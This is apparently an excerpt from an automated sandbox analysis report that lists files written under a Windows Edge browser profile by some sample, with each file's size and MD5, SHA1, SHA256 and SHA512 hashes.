SHA14ac1c448266e07a9c28b15c8a4b210995a6b2732
SHA25631ba85dad86b4edad8842508f571200f39617d6aaec3183c404f65d8028cdee7
SHA512d5ed5257d817cd04d07491d14583b7aa04e254f9177896641da5cf37323d38d4a50860f0677d4f6bb2e57c5abc72bbbf58827795838f08f5dce5c3dccb70f958
-
Filesize
15KB
MD5c784f472a9578f9ccf35c232720385c7
SHA1c1f8b4f00d856df1ff6fc4cf9d873dcd06475b28
SHA256d4c79b19bb96a4572775643a390c0d7dee38726a88209dcb326fe36dcbf3bb50
SHA512243c3ea506f03af8531417abc8f24b9be34f58636ac7460ef97a156ad5ef17d8a53d3de1a5c550b18bf75a5d5471693423c9c0c065579a473b6c18c314410fa9
-
Filesize
242KB
MD5ac83c7369c61901cd0a95db837a919e3
SHA164e3862fd9329217c5f95e39e2ccf9533e6d768e
SHA2567bd1ada028ae6c04900833c64c4aba501b92d447f11e02aabfd36cfac5293301
SHA5124c70878f0be41194d74053312279abf06a65ef545d392270bca991ef625a48b83685ca707854e9ca12b66636d8fd3969f4dbde6b321fa78a90705ef4d41120c3
-
Filesize
242KB
MD5ec3d154427958268f7e9c68556e4f006
SHA1f295b5cf0d62d81ccc85e97854d2e220363ed240
SHA256239509410ebb086a5c813195bb17bf1173b76880777c1a88a600a7d38c93538d
SHA512dfbfa0f2f773b43e2acd230072fa1235f3d588ffd7ccd9eedc99ed7085b40f90f2147b9663a8f7653d1c65c325aa640338482fcb41a0bfb901af05d890b2689b
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
152B
MD5709e5bc1c62a5aa20abcf92d1a3ae51c
SHA171c8b6688cd83f8ba088d3d44d851c19ee9ccff6
SHA256aa718e97104d2a4c68a9dad4aae806a22060702177f836403094f7ca7f0f8d4e
SHA512b9fc809fbb95b29336e5102382295d71235b0e3a54828b40380958a7feaf27c6407461765680e1f61d88e2692e912f8ec677a66ff965854bea6afae69d99cf24
-
Filesize
152B
MD5bc29044ff79dd25458f32c381dc676af
SHA1f4657c0bee9b865607ec3686b8d4f5d4c2c61cd7
SHA256efe711204437661603d6e59765aba1654678f2093075c1eb2340dc5e80a1140f
SHA5123d484f755d88c0485195b247230edb79c07cc0941dedbf2f34738ae4f80ba90595f5094c449b213c0c871ade6aff0a14d4acfe843186e2421ccbad221d34bf54
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize456B
MD5bd3af1c2823c67ea40a0adf5c01e00e7
SHA158d394710be24774db8b802e1c6ae438cf8bfe5e
SHA2567b02ae3707221fa1d2d5a54970098173b1120a1d0aefc1df75a3c972de45de4a
SHA512e5a5020ede05a022c85500bf136c3120f51a27d9647ea9a3585a5dd0b005745b85f088719ef7597d95a3a1d4c1bb46b518da2e557aab6c250d9b824f0148c8ac
-
Filesize
2KB
MD50710d124cc5ff1e1abeccd651e6e9878
SHA1782b50f97e95d63efb900ba4b2b386534904d0ae
SHA25632a22975216479e28859228ce69918deac709e60e1f786b0a73e83d886ea2b50
SHA51207f59e2d4864adab45b476154e8a93dacd09a657982842ced4b527817c5ccaf8b4bd19dbbc23fe5431a628164014e2fece3f03392b30e1085d3f20f990ac7264
-
Filesize
7KB
MD5a187bf15cf3fe3e26e7a44d80aa259ac
SHA13f8943d52badfd8d35ada0dccb247e388e695296
SHA256ad97e218f2516a422b2fdfefdd1a22cc2ae09213b05966dab2dd1a71c7a47bfb
SHA51229afd125062eeb3a6c61d1ebecae960d42b1cdf0b633ae8a5daef506e4624bf2cce810444ca677dcf627af41328f3ae7baee0c92bb522d588000d2e159ab69f3
-
Filesize
6KB
MD5a6fbba73b9c8fb6186dfa6b16466e7af
SHA1334b5f98ff8d842e5aae23a38088f8b29802e66f
SHA256eb4f8c18ca136f7ac7301e26a610b19983852d90b597c5565a441476bc381422
SHA512ade95fccae9612aa5ff3c306000f9c7a6625312ed66f76117a1ff5f89b9bf5e7886241490134b76958c4ce1d05ff562b1f7a79b9bb07d1046270638bd6bd3641
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\1ef7849a-0475-42a0-a455-1efe5182c235\index-dir\the-real-index
Filesize2KB
MD5472210a8475e680edef72aab6599d3c1
SHA15ce15190d20e10316af50350589d7d0b373d34b9
SHA2562c38ecaf24319e4b8db52b6380bc4efafd1799cdec1c767afcd266e364dd960f
SHA5127ad011ae8c40da6fb405ed9da0c97c4c037093bb7514870d7648b3e9b6c64a01535d84ed1c0356d71abfac30867f272f81dee390a69858d9e86f53efa6f816e7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\1ef7849a-0475-42a0-a455-1efe5182c235\index-dir\the-real-index~RFe599486.TMP
Filesize48B
MD5caff7ded3e71babf4ff4482ef4124f3c
SHA1c8e92fe61e4f4aa87a551ce9009dba5fc5566758
SHA2565060457ca4ba41fd83fbe635c3d9f7d08dc853ff6b2b1c3b15e80706a5fc34f3
SHA512171ca0ec3dc2e2b431b6c3eb63878290ffd8d9618be9f875fd614eea018e3fdeb3d43094f460c4bf112447c826886d8b5d15422c1c9da1a6738cff7a26de150e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize146B
MD5fbc9dc6329393c3571dfccb0dcd05a63
SHA1e5d9413e6f95676830913ec777e44790e0c94eee
SHA25611a2d6520d2784ab856d59dd3034cab85688686a0e0f8dbcc652c499559947fb
SHA512fcf9d0472b0806fc3534a190ede8a8d3ba5b0276f53d187b695195b987473450028d2d6cadf6b5ac849c21cdf036a0e4b35b7f69aebf438bb2ecff35806b0bc1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize84B
MD5877922d78432177b66dda4f589f7ee7d
SHA184795a418c2bfd2906081c147914485ba4118210
SHA256a3c24fd4679d565e8f492ef9db66647758fcd809ffefff1e4753f3795ad6917d
SHA5123611d4049394749bfdbc53d3e635335e50c103fbb208a6df31a8715cc907e5450386c7f37922c2ff0038321db58f53246a3632e1c459b581d2d6ee250b92cf7c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize89B
MD5ffdc1e57bf924a4b5bab1ac3a5f7d318
SHA1e32269f817159a382068b47068e7934ed85a86cf
SHA256d93d1ccab72d8817387e304ceadef5af455d310e1589018b76dcaadc50884414
SHA5120e9eacf3f3584b0df8e07c6d36eb753ba1ee149b172743e3ae7db7e0575b8f40819198044cf74ce8e4ea59ab57ec6550a7980b2b32810f04e30ff397df319d12
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize82B
MD54ad9c82c2be39b50a6a4b43c8fe3c633
SHA166de221168f88dae1153540447394343d7dfbd52
SHA256460e1589a92e25edf68dac1b249877bacff0f18da05e4e1814d438fc4f56c971
SHA51224407e24fdc82ee816d9218f4e4606b55d0dd0e91b2bb4a7e069971ae29de1706ed291bebe0b30471e15cc9331496fe548e217ee1d5cfe125aae0a8e33267ed7
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
Filesize41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize48B
MD505337bbee89b3ca3cc0a36c8eda145ac
SHA1168990cff707fae2f3f6b75ed87a307167396e40
SHA256e95a5768c60649c934e1ecf32ff3b408ebe8c7073a9e5cd6b6711caf63359145
SHA512a1360edd6a4dc29e9488da31656ba9741972565408141a94051a9502774d46faa1ed9383d348261b73b32e451b340ffec528c2388824dd2ef6ff17149d1e2625
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5994c4.TMP
Filesize48B
MD56370d4a28bee82d423ccb0f5dd0922b2
SHA1533fb5f214eeb519515310158712c213fd2d5726
SHA2563d7ba0837c479c0208a352332f9f18daa0946c98abf1d89e8578f442fd10578b
SHA512b734948c0fdbebe248b019f3a9cb7bb1f4ccdbbab6ec28f5b613e665d384bb74008e8617663de393ebbd38efcb6bbe6d9997c0cc86497f1b48ecfff89686a848
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
11KB
MD526f041a2b1ffbff9c32c6b5ee79c1c13
SHA18482ad2087fc601bba37371e8209c7acca87fe4f
SHA25650736d24b4c624f40994f8dc8361e0e9d5525490af9b34069a83d6e3e7e383db
SHA512a84e0930a281d259a2d335c5cf2d9d32e9182dcdc98c4ce6a2acfbcf1974ef2b247a83a7d60c560355aa58f1e4a190f4eae249ae760569acdaaddbde360ce8c9